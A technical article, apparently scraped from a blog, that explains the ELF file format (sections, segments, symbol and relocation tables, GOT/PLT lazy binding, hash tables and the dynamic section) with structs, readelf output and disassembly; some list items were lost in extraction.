\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Section nameTypeUsage (and equivalent runtime description)
.textSHT_PROGBITSMain executable code
.dataSHT_PROGBITSInitialised read and write data
.rodataSHT_PROGBITSRead only data
.bssSHT_NOBITSUninitialised read and write data
.data.rel.roSHT_PROGBITS
.tdataSHT_PROGBITSInitialised thread-local data (part of PT_TLS)
.tbssSHT_NOBITSUninitialised thread-local data (part of PT_TLS)
.initSHT_PROGBITSInitialisation code (usually .init, DT_INIT)
.finiSHT_PROGBITSTermination code (usually .fini, DT_FINI)
.init_arraySHT_INIT_ARRAYAddresses of initialisation functions (DT_INIT_ARRAY and DT_INIT_ARRAYSZ`)
.fini_arraySHT_FINI_ARRAYAddresses of termination functions (DT_FINI_ARRAY and DT_FINI_ARRAYSZ`)
.ctorsSHT_PROGBITSSimilar to .init_array but old-school
.dtorsSHT_PROGBITSSimilar to .fini_array but old-school
.dynsymSHT_DYNSYMDynamic symbol table (DT_SYMTAB)
.dynstrSHT_STRTABString table for dynamic linkins (DT_STRTAB)
.symtabSHT_SYMTABFull symbol table
.symtab_shndxSHT_SYMTAB_SHNDX
.strtabSHT_STRTABString table used for the symbol table
.relaXXXSHT_RELARelocations for section XXX, with addend
.relXXXSHT_RELRelocations for section XXX, without addend
.rela.dynSHT_RELAOther runtime relocations, with addend
.rel.dynSHT_RELOther runtime relocations, without addend
.rela.pltSHT_RELAPLT relocations, with addend
.rel.pltSHT_RELPLT relocations, without addend
.gotSHT_PROGBITSMain GOT
.got.pltSHT_PROGBITSPLT GOT, GOT used by the PLT (lazy relocations)
.hashSHT_HASHStandard symbol hash table (DT_HASH)
.gnu.hashSHT_GNU_HASHGNU symbol hash table (DT_GNU_HASH)
.gnu.versionSHT_VERSYMGNU symbol versions (DT_VERSYM)
.gnu.version_rSHT_VERNEEDGNU versions requirements (DT_VERNEED and DT_VERNEED_NUM)
.gnu.version_dSHT_VERDEFGNU versions definitions (DT_VERDEF and DT_VERDEF_NUM)
.debug_infoSHT_PROGBITSDWARF, Main DWARF section (variables, subprograms, types, etc.)
.debug_abbrevSHT_PROGBITSDWARF, Type of the nodes in debug_abbrev
.debug_arangesSHT_PROGBITSDWARF
.debug_lineSHT_PROGBITSDWARF, Mapping between instruction and source code lines
.debug_strSHT_PROGBITSDWARF, Strings for DWARF sections
.debug_fameSHT_PROGBITSDWARF, Stack unwinding information31
.debug_macroDebug macros (GNU extension)
.debug_link32
.stabSHT_PROGBITSDebugging informations in the (old) stab format
.stabstrSHT_PROGBITSStrings associated with the .stab section
.eh_frameSHT_PROGBITSRuntime stack unwinding information31
.eh_frame_hdrSHT_PROGBITSHeader (location and index) of the EH frame table (PT_GNU_EH_FRAME)
.shstrtabSHT_STRTABString table for section names
.note.XXXXSHT_NOTENote
.note.ABI-tagSHT_NOTEABI used in this file (NT_GNU_ABI_TAG)
.note.gnu.build-idSHT_NOTEBuild-id for thie build33 (NT_GNU_BUILD_ID note.)
.dynamicSHT_DYNAMICDynamic table, dynamic linking information (PT_DYNAMIC)
.interpSHT_PROGBITSInterpreter (PT_INTERP)
.groupSHT_GROUPGroup of related sections (used for COMDAT)
.comment
.jcrSHT_PROGBITSUsed for Java (?)
.stapsdt.baseUsed for SystemTap SDT
.note.stapsdtUsed for SystemTap SDT
.gcc_except_tableSHT_PROGBITSLSDA (Language Specific Data) for exception handling
.gnu.warningWarning message when linking against this file34
.gnu_warning.XXXSHT_PROGBITSWarning message when linking against symbol XXX34
.ARM.extabSHT_PROGBITS
.ARM.exidxSHT_ARM_EXIDX
.ARM.attributesSHT_ARM_ATTRIBUTES
\n

Section types

\n\n

Section link

\n

For symbol tables (SHT_SYMTAB and SHT_DYNSYM) and the dynamic\nsection (SHT_DYNAMIC), the sh_link gives the index of the string\ntable used to find the strings referenced in the section.

\n

For symbol hash tables (SHT_HASH and SHT_GNU_HASH) and relocation\ntables (SHT_RELA and SHT_REL), it gives the index of the\nassociated symbol table.

\n

Section info

\n

For relocation tables, the sh_info field gives the index of the\nsection it applies to. This is mostly relevant for .o files. For\nexecutables and DSOs on GNU systems, the .rela.dyn uses 0 because it\napplies to many different sections and rela.plt uses the index of\nthe .plt even if it applies to the .got.plt.

\n

For symbol tables, it gives the index in the symbol table which can be\nused to skip the STT_LOCAL symbols.

\n

Section flags

\n

The sh_flags is a field of flags:

\n\n

Program header table

\n

The program header table defines the execution view of the ELF file:

\n\n

The program table is an array of program headers:

\n
typedef struct {\n   uint32_t   p_type;   /* Segment type */\n   uint32_t   p_flags;  /* Segment flags */\n   Elf64_Off  p_offset; /* Segment file offset */\n   Elf64_ddr p_vaddr;   /* Segment virtual address */\n   Elf64_Addr p_paddr;  /* Segment physical address */\n   uint64_t   p_filesz; /* Segment size in file */\n   uint64_t   p_memsz;  /* Segment size in memory */\n   uint64_t   p_align;  /* Segment alignment */\n} Elf64_Phdr;\n
\n\n\n

The program header table can be seen with readelf -l. readelf\ntells as well which section is located in each region described in a\nprogram header entry.

\n

Segments

\n

A PT_LOAD entry represents a loadable segment to load (typically\nmmap()) in the program memory. A typical ELF executable or DSO has\ntwo such entries describing two segments28:

\n
    \n
  1. \n

    The first one is the text segment. It is executable, readable\n but not writable and contains code and read-only data (.text,\n .rodata, .plt, .eh_frame, etc);

    \n
  2. \n
  3. \n

    The second one is the data segment. It is readable, writable but\n not executable and contains the modifiable data (.data, .got,\n got.plt, .bss, etc.).

    \n
  4. \n
\n

The idea in this separation is that everything which does not need to\nbe written (read-only data, code) should be read-only:

\n\n

Security considerations

\n

Another important property in the design is that executable segments\nare not writable14. If a process has VMAs36 which are both\nexecutable and writable, an attacker might exploit bugs such as buffer\noverflows in order to write arbitraty code in the program's memory and\npossibly execute it. If the executable pages are read-only, the\nattackers can try to write arbitrary code but it will not be\nexecutable13.

\n

Example

\n

A simple hello world program:

\n
  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001c0 0x00000000000001c0  R E    8\n  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000000006dc 0x00000000000006dc  R E    200000\n  LOAD           0x00000000000006e0 0x00000000006006e0 0x00000000006006e0\n                 0x0000000000000230 0x0000000000002288  RW     200000\n  DYNAMIC        0x00000000000006f8 0x00000000006006f8 0x00000000006006f8\n                 0x00000000000001d0 0x00000000000001d0  RW     8\n  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000005b4 0x00000000004005b4 0x00000000004005b4\n                 0x0000000000000034 0x0000000000000034  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n
\n\n

We can see the resulting VMAs36 in /proc/$pid/maps of a\ncorresponding process:

\n\n
\n00400000-00401000 r-xp 00000000 08:13 27418661   /home/foo/temp/wait\n00600000-00601000 rw-p 00000000 08:13 27418661   /home/foo/temp/wait\n00601000-00603000 rw-p 00000000 00:00 0\n[...]\n
\n\n

Read only relocations

\n

On GNU systems, the dynamic linker may be instructed to mprotect()\nthe .got section against write access after the relocation is\nfinished. This improves the security by preventing the poisoning of\nthe (non-PLT) GOT26 after the relocation is done.

\n

This is enabled with ld -z relro (which generates a PT_GNU_RELRO\nentry) and disabled explicitly with ld -z norelo. When enabled,\nPT_GNU_RELRO is present in the program header table and describes a\nrange of memory which the dynamic linker can mprotect() after the\n(non-lazy) relocation is done (the .got section).

\n

The same example program linked with ld -z relro features the\nadditional PT_GNU_RELRO entry:

\n
Program Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n  INTERP         0x0000000000000238 0x0000000000400238 0x0000000000400238\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x000000000000070c 0x000000000000070c  R E    200000\n  LOAD           0x0000000000000e10 0x0000000000600e10 0x0000000000600e10\n                 0x0000000000000230 0x0000000000002258  RW     200000\n  DYNAMIC        0x0000000000000e28 0x0000000000600e28 0x0000000000600e28\n                 0x00000000000001d0 0x00000000000001d0  RW     8\n  NOTE           0x0000000000000254 0x0000000000400254 0x0000000000400254\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000005e4 0x00000000004005e4 0x00000000004005e4\n                 0x0000000000000034 0x0000000000000034  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x0000000000000e10 0x0000000000600e10 0x0000000000600e10\n                 0x00000000000001f0 0x00000000000001f0  R      1\n
\n\n

This can be seen in /proc/$pid/maps:

\n\n
\n00400000-00401000 r-xp 00000000 08:13 27418663   /home/foo/temp/wait2\n00600000-00601000 r--p 00000000 08:13 27418663   /home/foo/temp/wait2\n00601000-00602000 rw-p 00001000 08:13 27418663   /home/foo/temp/wait2\n00602000-00604000 rw-p 00000000 00:00 0\n[...]\n
\n\n

In addition, ld -z now (DF_BIND_NOW) might be used which disables\nlazy-relocation. By combining the two options, you can get an\nexecutable or DSO without .got.plt and all the GOT will be read-only\nafter relocation.

\n

Other program header entries

\n\n

String tables

\n

String tables are lists of strings. They use the SHT_STRTAB section\ntype. Each string in the string table is terminated by a NUL byte and\nis referenced by its byte offset from the beginning of the table.

\n

The first entry of a string table is always the empty string (the\nfirst byte of a string table is always NUL): the empty string can\nalways be designated with the zero offset.

\n

The content of a string section can be displayed with readelf -p .dynstr\nor with objcopy a.out --dump-section .dynstr=/dev/stdout /dev/null | tr '\\000' '\\n'.

\n

Usages:

\n\n

References to string tables:

\n\n

Example of .shstrtab (x86_64 GNU/Linux)

\n

Section Headers:

\n
\n[Nr] Name              Type             Address           Offset\n     Size              EntSize          Flags  Link  Info  Align\n[27] .shstrtab         STRTAB           0000000000000000  000008f1\n     0000000000000108  0000000000000000           0     0     1\n
\n\n

File hexdump:

\n
[...]\n000008b0: 0000 0000 0000 0000 4743 433a 2028 4465  ........GCC: (De\n000008c0: 6269 616e 2034 2e39 2e32 2d31 3029 2034  bian 4.9.2-10) 4\n000008d0: 2e39 2e32 0047 4343 3a20 2844 6562 6961  .9.2.GCC: (Debia\n000008e0: 6e20 342e 382e 342d 3129 2034 2e38 2e34  n 4.8.4-1) 4.8.4\n000008f0: 0000 2e73 796d 7461 6200 2e73 7472 7461  ...symtab..strta\n00000900: 6200 2e73 6873 7472 7461 6200 2e69 6e74  b..shstrtab..int\n00000910: 6572 7000 2e6e 6f74 652e 4142 492d 7461  erp..note.ABI-ta\n00000920: 6700 2e6e 6f74 652e 676e 752e 6275 696c  g..note.gnu.buil\n00000930: 642d 6964 002e 676e 752e 6861 7368 002e  d-id..gnu.hash..\n00000940: 6479 6e73 796d 002e 6479 6e73 7472 002e  dynsym..dynstr..\n00000950: 676e 752e 7665 7273 696f 6e00 2e67 6e75  gnu.version..gnu\n00000960: 2e76 6572 7369 6f6e 5f72 002e 7265 6c61  .version_r..rela\n00000970: 2e64 796e 002e 7265 6c61 2e70 6c74 002e  .dyn..rela.plt..\n00000980: 696e 6974 002e 7465 7874 002e 6669 6e69  init..text..fini\n00000990: 002e 726f 6461 7461 002e 6568 5f66 7261  ..rodata..eh_fra\n000009a0: 6d65 5f68 6472 002e 6568 5f66 7261 6d65  me_hdr..eh_frame\n000009b0: 002e 696e 6974 5f61 7272 6179 002e 6669  ..init_array..fi\n000009c0: 6e69 5f61 7272 6179 002e 6a63 7200 2e64  ni_array..jcr..d\n000009d0: 796e 616d 6963 002e 676f 7400 2e67 6f74  ynamic..got..got\n000009e0: 2e70 6c74 002e 6461 7461 002e 6273 7300  .plt..data..bss.\n000009f0: 2e63 6f6d 6d65 6e74 0000 0000 0000 0000  .comment........\n
\n\n

This string table of section names starts at 0x8f1:

\n\n

Symbols and the symbol table

\n

What's a symbol?

\n

Symbols are used for linking (by the link editor and the dynamic\nlinker).

\n

The C statement:

\n
extern int foo;\n\nint foo = 3;\n
\n\n\n

defines a global variable associated with the foo symbol15.

\n

A user of this global variable:

\n
extern int foo;\n\nint foo_updater()\n{\n  return foo++;\n}\n
\n\n\n

will link to the foo symbol.

\n

The linker will bind the user of the global variable with the global variable\nbecause they are using the same symbol name.

\n

Symbol tables

\n

Three section header table often includes two different symbol tables:

\n\n

The former can be used by debugging tools and the latter contains the\nminimum amount of entries for the dynamic linker. For this reason,\nonly the latter is mapped in the process virtual address space and is\npresent in the dynamic table.

\n

The symbol tables are arrays of symbol entries:

\n
typedef struct {\n  Elf64_Word    st_name;  /* Symbol name (string tbl index) */\n  unsigned char st_info;  /* Symbol type and binding */\n  unsigned char st_other; /* Symbol visibility (and 0) */\n  Elf64_Section st_shndx; /* Section index */\n  Elf64_Addr    st_value; /* Symbol value */\n  Elf64_Xword   st_size;  /* Symbol size */\n} Elf64_Sym;\n
\n\n\n

At runtime, the dynamic symbol table is given by the dynamic table\nentry ST_SYMTAB. Its size is not given and can be\ninferred\nfrom the hash table (DT_HASH or DT_GNU_HASH).

\n

readelf -s can display the symbol tables.

\n

Symbol type

\n\n

Section index

\n

Each symbol can be associated with a section (by it's index).

\n

Some special values are used:

\n\n

Visibility and binding

\n

Common visibility and binding combinations:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
BindingVisibilityMeaning
STT_LOCALSTV_DEFAULTLocal to relocatable object
STT_GLOBALSTV_HIDDENLocal to the executable or DSO37
STT_GLOBALSTV_DEFAULTGlobal (visible in other runtime ELF modules)
\n

Symbol binding

\n

The symbol binding control the link-time visibility of the symbol\n(i.e. outside translation units and within a given ELF runtime objecte\nbut not accross runtime ELF objects). It is a part of the stb_info\nfield.

\n\n

Multiple symbols with the same name can be in the same ET_EXEC or ET_DYN\n (originating from different ET_REL): they are usually located before a\n STT_FILE entry with the source file name\n of the corresponding compilation unit in the .symtab

\n\n

When combining multiple .o files into one executable or DSO, the\n link editor will raise an error if multiple STT_GLOBAL versions of\n the same symbols are defined but a STT_WEAK symbol with the same\n name as a STT_GLOBAL or another STT_WEAK symbol can appear.

\n

A weak symbol does not need to be resolved: an unresolved weak\n symbol has a value of 0. The link editor will not pull .o\n relocatable objects from .a archives in order to resolve undefined\n weak symbols.

\n

Symbol visibility

\n

The symbol visibility controls the visibility across executable and\nDSOs. It is stored in the st_other field. This field is not\nrelevant for STT_LOCAL symbols.

\n

The different values are:

\n\n

The STT_HIDDEN can be used in order to mark symbols which needs not\nbe used outside of the DSO:

\n\n

The visibility of a symbol can be defined in GCC with the visibility\nattribute:

\n
int get_answer(void) __attribute__(visibility(\"hidden\"))\n{\n  return 42;\n}\n
\n\n\n

The default visibility can be changed with command-line\narguments\nwith recent versions of GCC (gcc -fvisibility=hidden) or with\npragmas:

\n
#pragma GCC visibility push(hidden)\nint get_answer(void) __attribute__(visibility(\"hidden\"))\n{\n  return 42;\n}\n#pragma GCC visibility pop(hidden)\n
\n\n\n

Relocation tables

\n

The relocation tables are arrays of relocation entries using one of those\nforms:

\n
typedef struct {\n  Elf64_Addr    r_offset;  /* Address */\n  Elf64_Xword   r_info;    /* Relocation type and symbol index */\n} Elf64_Rel;\n\ntypedef struct {\n  Elf64_Addr    r_offset;  /* Address */\n  Elf64_Xword   r_info;    /* Relocation type and symbol index */\n  Elf64_Sxword  r_addend;  /* Addend */\n} Elf64_Rela;\n
\n\n\n

The relocations exist in two forms. In both cases an addend\nis added to the symbol:

\n\n

readelf -r can display the relocation tables.

\n

Relocation address

\n

ET_REL files have one relocation section .rela.foo (or .rel.foo)\nper relocated section .foo. The r_offset address of the relocation\nis the offset of within the relocated .foo section.

\n

For ET_EXEC and ET_DYN files, there is usually two relocation\ntables: the normal relocation table .rela.dyn (or .rel.dyn) and\nthe lazy/PLT relocation table .rela.plt (or .rel.plt). The\nr_offset address of the relocation has a different meaning: it is\nthe (runtime) virtual address of the relocation. The location of the\nrelocation tables is described at runtime in the dynamic section\n(DT_RELA, DT_REL, DT_RELASZ, DT_RELSZ, DT_RELAENT,\nDT_RELENT DL_PLTREL, PLTRELSZ, DT_JMPREL).

\n

GOT

\n

The executable code is (usually) in the read-only segment:

\n\n

As we do no want to modify the code (in the readonly text segment) in\norder to share it, the dynamic linker cannot relocate the DSO by\npatching the addresses of the referenced objects in the executable\ncode. Instead, the address of the object is stored by the dynamic\nlinker in the writable segment and the code fetches this address.

\n

The link editor creates a section in the writable segment, the GOT\n(.got), containing all the slots for those addresses35. It\ncreates a relocation entries in order to make the dynamic linker store\nthe suitable values in the GOT.

\n

GOT example x86_64

\n

Compilation

\n

For example, this C code:

\n
extern int foo;\n\nint get_foo()\n{\n  return foo;\n}\n
\n\n\n

compiles into this (gcc -S deref.c -o- -fPIC):

\n
get_foo:\n        movq    foo@GOTPCREL(%rip), %rax\n        movl    (%rax), %eax\n        ret\n
\n\n\n

foo@GOTPCREL(%rip) resolves to a memory address (a entry in the GOT)\nwhere the address of foo is written: the first instruction stores\nthis address in the %rax register. In the next instruction, the\nprocessor fetches the foo variable by dereferencing this address.

\n

Relocatable object

\n

When compiled into a relocatable object, we get this relocation:

\n
Relocation section '.rela.text' at offset 0x250 contains 1 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000000003  000b00000009 R_X86_64_GOTPCREL 0000000000000000 foo - 4\n
\n\n

It asks the link editor to generate a GOT entry for the address of\nfoo and fill the relative address of this GOT entry in the\ninstruction (movq foo@GOTPCREL(%rip), %rax). The link editor\ncreates the GOT entry.

\n

An addend of -4 is used because the relative instructions in x86 are\nusing the address of the next instruction as a base\naddress.

\n

Shared-object

\n

At runtime, the GOT entry needs to be filled by the dynamic linker. In\norder to do this, the link editor creates a relocation for the GOT\nentry in the shared-object:

\n
Relocation section '.rela.dyn' at offset 0x458 contains 9 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000200990  000800000006 R_X86_64_GLOB_DAT 00000000002009ec foo + 0\n
\n\n

This entry sets the third entry in the .got GOT1:

\n
\n[19] .got              PROGBITS         0000000000200980  00000980\n     0000000000000030  0000000000000008  WA       0     0     8\n
\n\n

PLT

\n

The Procedure Linkage table is used for calling functions whose\naddress is not known at link time (because they might be in another\nshared-object or the executable). The PLT can be disassembled with\nobjdump -D -j .plt.

\n

For example this code:

\n
#include <stdlib.h>\n\nint main(int argc, char** argv)\n{\n  abort();\n  return 0;\n}\n
\n\n\n

is compiled into (gcc test.c -S -o- -fPIC -O3):

\n
main:\n        subq    $8, %rsp\n        call    abort\n
\n\n\n

When decompiling the resulting executable we find that the call to\nfoo as been replaced by a call to a stub for abort@plt (called a\ntrampoline):

\n
0000000000400410 <main>:\n  400410:       48 83 ec 08             sub    $0x8,%rsp\n  400414:       e8 c7 ff ff ff          callq  4003e0 <abort@plt>\n
\n\n

This trampoline fetches the address of the abort in the GOT and\njumps to this address:

\n
00000000004003e0 <abort@plt>:\n  4003e0:       ff 25 ea 04 20 00       jmpq   *0x2004ea(%rip)  # 6008d0 <_GLOBAL_OFFSET_TABLE_+0x18>\n  4003e6:       68 00 00 00 00          pushq  $0x0\n  4003eb:       e9 e0 ff ff ff          jmpq   4003d0 <_init+0x28>\n
\n\n

All of this is done by the first instruction of this PLT trampoline:\nthe two remaining instructions are used for lazy relocation which is\nexplained afterwards.

\n

A relocation exists in order to store the address of foo in this PLT\nGOT entry:

\n
Relocation section '.rela.plt' at offset 0x360 contains 3 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006008d0  000100000007 R_X86_64_JUMP_SLO 0000000000000000 abort +\n
\n\n

Lazy relocations

\n

Relocation in dynamic linking can slow down the initialisation of the\napplication: each symbol must be looked up in all loaded DSOs and the\nexecutable. In order to speed up the relocation of programs, lazy\nrelocation is used for function calls17: the corresponding PLT\nGOT entry is not filled with the address of the function in the\nprocess initialisation but only when the function is actually called.

\n
# Special .PLT0 entry:\n00000000004003d0 :\n  4003d0:  ff 35 ea 04 20 00   pushq  0x2004ea(%rip)  # 6008c0 <_GLOBAL_OFFSET_TABLE_+0x8>\n  4003d6:  ff 25 ec 04 20 00   jmpq   *0x2004ec(%rip) # 6008c8 <_GLOBAL_OFFSET_TABLE_+0x10>\n  4003dc:  0f 1f 40 00\n\n# .PLT1 for abort:\n00000000004003e0 <abort@plt>:\n  4003e0:  ff 25 ea 04 20 00   jmpq   *0x2004ea(%rip) # 6008d0 <_GLOBAL_OFFSET_TABLE_+0x18>\n  4003e6:  68 00 00 00 00      pushq  $0x0\n  4003eb:  e9 e0 ff ff ff      jmpq   4003d0 <_init+0x28>\n
\n\n
    \n
  1. \n

    The dynamic linker preinitialises the PLT GOT,

    \n\n
  2. \n
  3. \n

    on the first call of the PLT trampoline abort@plt,

    \n

    a. the first instruction of the trampoline jumps to the second\n instruction of the trampoline;

    \n

    b. the second instruction of the PLT pushes on the stack the index\n of this relocation in the relocation table (from DT_JMPREL);

    \n

    c. the third instruction jumps to the first entry of the PLT\n (.PLT0);

    \n

    d. this entry pushes the second entry of the PLT GOT on the stack\n (this is used by the dynamic linker to identify this\n shared-object);

    \n

    e. this entry jumps to the callback of the dynamic linker;

    \n

    f. the dynamic linker does the real relocations,

    \n\n

    g. the function is executed;

    \n
  4. \n
  5. \n

    on other calls, the PLT GOT entry now contains the address of the\n function and the PLT entry jumps to it directly (instead of jumping\n to .PLT0 and to the dynamic linker).

    \n
  6. \n
\n

In the section header table:

\n\n

In the dynamic section:

\n\n

PLT example for x86_64

\n

Compilation

\n

This time let's compile a function call:

\n
extern int foo(void);\n\nint get_foo()\n{\n  return foo() + 42;\n}\n
\n\n\n

We get this assembly (cc -O3 -S -fpic):

\n
get_foo:\n.LFB0:\n        subq    $8, %rsp\n        call    foo@PLT\n        addq    $8, %rsp\n        addl    $42, %eax\n        ret\n
\n\n\n

The foo@PLT asks the assembler to use the address of a PLT entry for\nthe foo function

\n

Relocatable object

\n

We get this relocation in the relocatable object:

\n
Relocation section '.rela.text' at offset 0x260 contains 1 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000000005  000b00000004 R_X86_64_PLT32    0000000000000000 foo - 4\n
\n\n

It asks the link editor to patch the instruction with the 32-bit\nrelative address of the PLT entry for symbol foo. The link editor\ncreates a PLT entry, corresponding PLT GOT entry (in the .got.plt)\nsection and a relocation entry for this PLT GOT entry (in\n.rela.dyn).

\n

Shared-object

\n

We get this relocation in the shared-object:

\n
Relocation section '.rela.plt' at offset 0x4f0 contains 3 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n000000200960  000400000007 R_X86_64_JUMP_SLO 0000000000000000 foo + 0\n
\n\n

This relocation entry asks the dynamic linker to lazily initialise\nthe PLT GOT entry:

\n
    \n
  1. \n

    it will first fill the PLT GOT entry with the second instruction of\n the associated PLT entry;

    \n
  2. \n
  3. \n

    when the PLT is called, it will call the dynamic linker which will\n initialise the PLT GOT entry with the address of the foo symbol.

    \n
  4. \n
\n

Some x86_64 relocations

\n

Link time relocation:

\n\n

Runtime relocations:

\n\n

Some x86 relocations

\n\n

Hash tables

\n

Standard hash table

\n

The standard hash table is built by the link editor. It is described\nby the .hash SHT_HASH section and by the DT_HASH entry in the\ndynamic section. Its structure is quite\nsimple:

\n
// Pseudo-C:\nstruct {\n  Elf32_Word nbucket;          /* Number of buckets */\n  Elf32_Word nchain;           /* Numer of entries in .dynsy* */\n  Elf32_Word buckets[nbucket]; /* First entry in the chain */\n  Elf32_Word chains[nchain];   /* Next entry in the chain */\n};\n
\n\n\n\n

The lookup looks like this:

\n
Elf64_Sym const* lookup_symbol(\n  const char* symbol,\n  Elf64_Sym const* symbol_table\n  const char* string_table,\n  Elf32_Word const* hash_table)\n{\n  Elf32_Word nbucket           = hash_table[0];\n  Elf32_Word nchain            = hash_table[1];\n  Elf32_Word const* buckets    = hash_table + 2;\n  Elf32_Word const* chains     = hash_table + 2 + nbucket;\n\n  unsigned long hash = elf_hash(symbol_name);\n\n  // Iterate on the chain:\n  while (Elf32_Word index = buckets[hash % nbucket];\n         chains[index] != STN_UNDEF;\n    index = chains[index])\n    if (strcmp(symbol, string_table + symbol_table[index].st_name) == 0)\n      return symbol_table + index;\n\n  return NULL;\n}\n
\n\n\n

GNU hash table

\n

The GNU hash table is a more efficient alternative to the standard\nhash table18. Both can be present in the same ELF file but\nmodern GNU ELF files usually only contains the GNU hash table. It is\ndescribed by the .gnu.hash SHT_GNU_HASH section and by the\nDT_GNU_HASH entry in the dynamic section.

\n

Main differences:

\n\n
// Pseudo-C:\nstruct Gnu_Hash_Header {\n  uint32_t nbuckets;\n  uint32_t symndx;    /* Index of the first accessible symbol in .dynsym */\n  uint32_t maskwords; /* Nyumber of elements in the Bloom Filter */\n  uint32_t shift2;    /* Shift count for the Bloom Filter */\n  uintXX_t bloom_filter[maskwords];\n  uint32_t buckets[nbuckets];\n  uint32_t values[dynsymcount - symndx];\n};\n
\n\n\n

Notes

\n

Each entry of a note section begins with:

\n
typedef struct {\n  Elf64_Word n_namesz;  /* Length of the note's name.  */\n  Elf64_Word n_descsz;  /* Length of the note's descriptor.  */\n  Elf64_Word n_type;    /* Type of the note.  */\n} Elf64_Nhdr;\n
\n\n\n

After this comes the note name and the note content:

\n\n

Padding is used after the name and the content of the note to ensure\n 4 byte alignment.

\n

Each note is usually in its own section (.note.XXX) but they are all\ngrouped in the same program entry. readelf -n can display the notes.

\n

GNU notes

\n

GNU notes are using the string \"GNU\" (with a terminating 0 byte) and\ndefine the notes:

\n\n

The first 64-bit is the target system (ELF_NOTE_OS_LINUX for Linux)\n and the following bytes are a minimum version number.

\n

Example (GNU/Linux 2.6.32):

\n

Hex dump of section '.note.ABI-tag':\n   0x0040021c 04000000 10000000 01000000 474e5500 ............GNU.\n   0x0040022c 00000000 02000000 06000000 20000000 ............ ...\n   
\n\n

Example (d53a4435d14a5ac3009bad8c6f840175b37aa86a):

\n

Hex dump of section '.note.gnu.build-id':\n  0x00400274 04000000 14000000 03000000 474e5500 ............GNU.\n  0x00400284 d53a4435 d14a5ac3 009bad8c 6f840175 .:D5.JZ.....o..u\n  0x00400294 b37aa86a                            .z.j\n  
\n\n

CORE notes

\n

See Anatomy of an ELF core file.

\n

LINUX notes

\n

See Anatomy of an ELF core file.

\n

Dynamic section

\n

The dynamic section provides important informations for the dynamic\nlinker. A statically linked executable does not have a PT_DYNAMIC\nentry.

\n

It is an array of entries with the structure:

\n
typedef struct {\n  Elf64_Sxword  d_tag;   /* Dynamic entry type */\n  union {\n    Elf64_Xword d_val; /* Integer value */\n    Elf64_Addr d_ptr;  /* Address value */\n  } d_un;\n} Elf64_Dyn;\n
\n\n\n

readelf -d can display the content of the dynamic section.

\n

The dynamic table is available as at runtime with the _DYNAMIC local\nsymbol. A DT_NULL entry marks the end of the dynamic section.

\n

Shared objects

\n\n

RPATH

\n

The DT_RUNRPATH (and DT_RPATH 20) defines an additional path\nwhere the shared-objects should be searched.

\n

The dynamic linker (ld.so) recognises several special values in\nDT_RUNRPATH (and DT_RPATH):

\n\n

The DT_RPATH can be set with ld -rpath='$ORIGIN' (or gcc\n-Wl,-rpath='$ORIGIN'). ld --enable-new-dtags might be needed to add\nthe DT_RUNPATH entries as well.

\n

Symbols

\n\n

The type of hash table generated by the link editor can be chosen with\nld --hash-style=style=sysv|gnuboth`. By default, the GNU hash table\nis used on (not-too old) GNU systems.

\n

Symbol versions

\n

DT_VERSYM, DT_VERNEED and DT_VERNEEDNUM are used for GNU symbol\nversioning.

\n

Relocations

\n

At runtime there's usually two different relocation tables: the main\nrelocation table and the PLT relocation table.

\n

The main relocation table (.rela.dyn section) is located with\nDT_RELA (address), DT_RELASZ (byte size of the relocation table),\nDT_RELAENT (byte size of a relocation entry) for relocation tables\nwith addend. The main relocation table without addend uses DT_REL,\nDT_RELSZ and DT_RELENT.

\n

